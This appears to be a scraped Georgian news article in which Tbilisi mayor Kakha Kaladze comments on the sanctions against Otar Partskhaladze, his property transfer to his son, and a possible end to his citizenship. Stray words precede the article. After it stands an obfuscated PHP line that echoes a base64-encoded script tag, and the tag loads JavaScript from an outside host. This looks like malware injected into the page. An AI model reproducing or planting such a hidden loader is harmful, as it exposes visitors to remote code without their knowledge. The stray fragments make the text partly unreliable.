celsiusi
ავერსი შნაიდერი

 თბილისის მერის, კახა კალაძის განცხადებით, როგორც აქვს ინფორმაცია, სანქციები, რომლებიც დაწესდა ოთარ ფარცხალაძის მიმართ, არ ზღუდავს ქონების გადაფორმება-არგადაფორმებას.

აღნიშნული კომენტარით კალაძემ უპასუხა ჟურნალისტის კითხვას: „როგორ შეაფასებთ თურნავას გადაწყვეტილებას მას შემდეგ, რაც ფარცხალაძემ მოასწრო და ქონება გადააფორმა შვილზე. პარალელურად, ვნახეთ გუშინდელი მოვლენებიც. რას ცდილობს ამით ხელისუფლება?“.

„ახსნა-განმარტებები გაკეთდა ეროვნული ბანკის მიერ, თურნავაც გამოვიდა, რამდენჯერმე ისაუბრა აღნიშნულ გადაწყვეტილებასთან დაკავშირებით და ყველაფერი ცხადია, ჩვენ პირველ რიგში, პატივი უნდა ვცეთ ჩვენს კონსტიტუციას, პატივი უნდა ვცეთ ჩვენს სახელმწიფოს, კანონებს და ამ ქვეყანაში მცხოვრებ ადამიანებს. რაც შეეხება ქონების გადაფორმება-არგადაფორმებას, მე იურისტი არ ვარ, შეიძლება, გამიჭირდეს ამ დეტალებში შესვლა, თუმცა როგორც ვიცი, მას ამის უფლება აქვს და აღნიშნული სანქციები არ ზღუდავს ქონების გადაფორმება-არგადაფორმებას. ეს მას შეეძლო ნებისმიერ დროს. აღნიშნული სანქციები იყო ფინანსური მიმართულებით და საბანკო ანგარიშებთან დაკავშირებით“, – აღნიშნა კახა კალაძემ.

რაც შეეხება კითხვას, „რატომ არ იყო მანამდე დაწყებული პროცედურები მოქალაქეობის შეწყვეტასთან დაკავშირებით და ახლა არის თუ არა მიზანშეწონილი, რომ ფარცხალაძეს შეუჩერდეს საქართველოს მოქალაქეობა?“, – კალაძე პასუხობს: „არ ვიცი, ამას იკვლევს შესაბამისი უწყება, ჰაერზე ხომ არ ხდება, ვიღაცას მოქალაქეობა შეუწყვიტოს, ვიღაცას მიანიჭოს. ამას იკვლევს შესაბამისი უწყება და ის ანალიზი, რომელიც გაკეთდა. პირველივე დღეებში გამოვიდა შესაბამისი უწყება და თქვა, რომ დაწყებულია მოკვლევა. ამ მოკვლევის ფარგლებში იქნება გადაწყვეტილება მიღებული, როგორც საჭიროა კანონის, კონსტიტუციის შესაბამისად“.

887
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");